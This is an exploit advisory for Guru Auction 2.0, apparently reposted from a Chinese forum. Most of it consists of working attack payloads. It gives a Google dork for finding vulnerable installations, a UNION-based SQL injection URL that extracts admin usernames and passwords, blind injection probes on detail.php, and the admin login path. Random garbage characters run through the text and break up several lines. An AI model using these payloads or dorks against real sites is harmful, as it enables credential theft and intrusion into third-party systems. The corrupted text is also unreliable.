Guru Auction 2.0 Multiple SQL Injection Vulnerabilities! S6 L# d. E: p3 }7 M
3 e4 m. s W! [
作者 : v3n0m
) z. E' o6 q4 ?" ?应用 : Guru Auction 2.0' C2 z$ e) Y# L; _! K
Price : $49
+ t, \8 P& H: o5 UVendor : http://www.guruscript.com/
1 N6 ~" p, p% I3 f- P: HGoogle Dork : inurl:subcat.php?cate_id=' X& N" [, G) c; e% a4 m5 N4 u" P
/ {9 d' i! r' S) ?- K8 YSQLi p0c:5 Y- u- p7 F. q5 {3 m4 B' w
~~~~~~~~~~8 h2 H* u0 a$ ]+ r* ~; A$ ]
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
% B. i$ H- _3 M$ j # H! ]9 G9 v) G
$ V9 d" e; R* V& N3 W7 V; v- _
盲注 p0c:
( i7 c- U* U+ y+ {~~~~~~~~~~' ~# O' V' E1 ]
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true1 l: Y$ H. [5 I W$ ^; T% ?
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false. c8 _, |" o8 a7 G- w8 j
! H0 F I5 \& @" `, G, @" C* C! f8 c管理登录入口:
% e# K( |. {) W( j~~~~~~~~~~
: B* g2 N1 L# V/ e; x" s3 m. @http://domain.tld/[path]/admin/' u7 d/ V1 R9 R+ J6 I
|